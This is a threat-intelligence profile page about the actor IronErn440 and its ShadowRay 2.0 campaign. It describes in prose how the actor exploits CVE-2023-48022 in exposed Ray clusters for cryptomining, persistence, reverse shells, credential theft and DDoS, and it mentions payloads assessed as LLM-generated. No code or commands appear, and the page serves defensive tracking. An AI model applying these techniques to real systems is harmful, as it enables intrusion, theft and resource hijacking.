Skip to main content
Mallory
Back to threat actors
3 malware familiesExploits CVEs in the wild

IronErn440

Also known asironern440

IronErn440 is a threat actor tracked by Oligo Security and associated with the ShadowRay 2.0 campaign targeting internet-exposed Ray clusters globally. The actor exploits CVE-2023-48022, a critical remote code execution issue in exposed Ray dashboard infrastructure, and abuses Ray’s unauthenticated job submission APIs and orchestration features to execute multi-stage Bash and Python payloads across cluster nodes, including large GPU-rich environments. Oligo reported the activity has been active since at least September 2024 and described it as a major evolution from earlier ShadowRay exploitation, while also assessing it appears to be a different attacker or group than the 2023 ShadowRay activity. The operation is described as a self-propagating cryptojacking botnet. IronErn440 uses compromised Ray clusters for cryptocurrency mining, lateral movement to non-internet-facing and internal-network machines, data and credential theft, and DDoS attacks. Reported techniques and behaviors include at-scale discovery of exploitable Ray dashboards using interact.sh callbacks, use of Ray’s NodeAffinitySchedulingStrategy to run malware on every alive node in a cluster, deployment of XMRig to mine Monero, throttling miner resource usage to reduce detection, deceptive file paths and fake process names such as "dns-filter," persistence via cron jobs and systemd modifications, termination of rival miners, blocking of competing mining pools via /etc/hosts and iptables, opening Python reverse shells for interactive control, and use of Sockstress for DDoS activity. Oligo reported that numerous organizations were targeted, with particular emphasis on organizations operating massive clusters and expensive GPU environments. In several cases, the actor accessed proprietary assets including AI models, datasets, application source code, cloud credentials, database credentials, and retained production user data. Oligo also reported two 2025 attack waves: an initial wave using GitLab for payload delivery and updates, followed by a shift to GitHub after GitLab removed the attacker’s infrastructure on November 5. The payloads were assessed by Oligo as likely AI/LLM-generated based on code structure, comments, and error-handling patterns. Known alias in the provided content: ironern440. The activity is associated with the ShadowRay 2.0 campaign.

Share:
Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial
MITRE ATT&CK

Tradecraft

13 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

11 of 15 tactics22 techniques×N= number of intelligence reports citing this technique
MITRE ATT&CK
TA0043
Reconnaissance
1 technique
T1595
Active Scanning
T1595.002
Vulnerability Scanning
TA0001
Initial Access
1 technique
T1190×2
Exploit Public-Facing Application
TA0002
Execution
2 techniques
T1053
Scheduled Task/Job
T1053.003
Cron
T1059
Command and Scripting Interpreter
T1059.006
Python
TA0003
Persistence
2 techniques
T1053
Scheduled Task/Job
T1053.003
Cron
T1543
Create or Modify System Process
T1543.002
Systemd Service
TA0004
Privilege Escalation
2 techniques
T1053
Scheduled Task/Job
T1053.003
Cron
T1543
Create or Modify System Process
T1543.002
Systemd Service
TA0005
Stealth
1 technique
T1036
Masquerading
TA0007
Discovery
1 technique
T1082
System Information Discovery
TA0008
Lateral Movement
1 technique
T1021×2
Remote Services
TA0011
Command and Control
1 technique
T1105×2
Ingress Tool Transfer
TA0010
Exfiltration
1 technique
T1041
Exfiltration Over C2 Channel
TA0040
Impact
2 techniques
T1496×2
Resource Hijacking
T1498×2
Network Denial of Service
ARSENAL

Associated malware families

3 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen
ShadowRayA global campaign dubbed ShadowRay 2.0 hijacks exposed Ray Clusters by exploiting an old code execution flaw to turn them into a self-propagating cryptomining botnet.2Mar 18, 2026
SockstressIt can also launch DDoS attacks using the Sockstress tool, which exploits asymmetric resource consumption by opening large numbers of TCP connections through raw sockets.1Mar 18, 2026
XMRigIt uses XMRig to mine for Monero and makes sure that it uses only 60% of the processing power to evade immediate detection.1Mar 18, 2026
WEAPONIZED

Associated vulnerabilities

1 CVE this actor has used in observed campaigns. 1 of them exploited in the wild.

CVE-2023-48022Unauthenticated RCE in Anyscale Ray Job Submission APIIn the wildEvidence2

Oligo researchers found that an old critical vulnerability tracked as CVE-2023-48022 was exploited in both campaigns... The attacks leverage CVE-2023-48022 to submit jobs to Ray’s unauthenticated Jobs API to run multi-stage Bash and Python payloads...

ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app
dark readingNews
Nov 24, 2025
ShadowRay 2.0 Turns AI Clusters into Crypto Botnets

IronErn440 is conducting a large-scale campaign (ShadowRay 2.0) exploiting a remote code execution vulnerability in the Ray framework to hijack AI compute infrastructure worldwide. They use compromised clusters for cryptomining, data theft, botnet expansion, and further intrusions, targeting AI startups, research labs, and cloud-hosted environments.

Read more
scworldNews
Nov 19, 2025
Internet-exposed Ray clusters targeted by self-replicating botnet | SC Media

Threat operation targeting organizations with large Ray clusters/GPU environments; uses callback-based discovery and unauthenticated Ray job submission APIs to enable cryptomining, lateral movement, broader host compromise, data theft, and DDoS staging.

Read more
register securityNews
Nov 18, 2025
Self-replicating botnet attacks Ray clusters

Active campaign compromising internet-facing Ray clusters to build a self-propagating botnet for cryptomining, data theft, lateral movement/pivoting to internal nodes, and launching DDoS attacks; uses Ray job submission/scheduling features to execute payloads across cluster nodes and maintains malware delivery/update infrastructure via GitLab/GitHub repos and AWS-hosted C2 reverse shells.

Read more
bleeping computerNews
Nov 18, 2025
New ShadowRay attacks convert Ray clusters into crypto miners

Hijacks internet-exposed Ray clusters by exploiting CVE-2023-48022 to submit jobs via Ray’s unauthenticated Jobs API, deploy multi-stage Bash/Python payloads, self-propagate cluster-to-cluster, run Monero cryptomining (XMRig), open reverse shells for interactive control and potential data/credential theft, and conduct DDoS using Sockstress. Uses GitLab/GitHub for payload delivery and maintains persistence via cron and systemd changes while suppressing rival miners.

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Start free trial
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping13

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal3

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs1

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.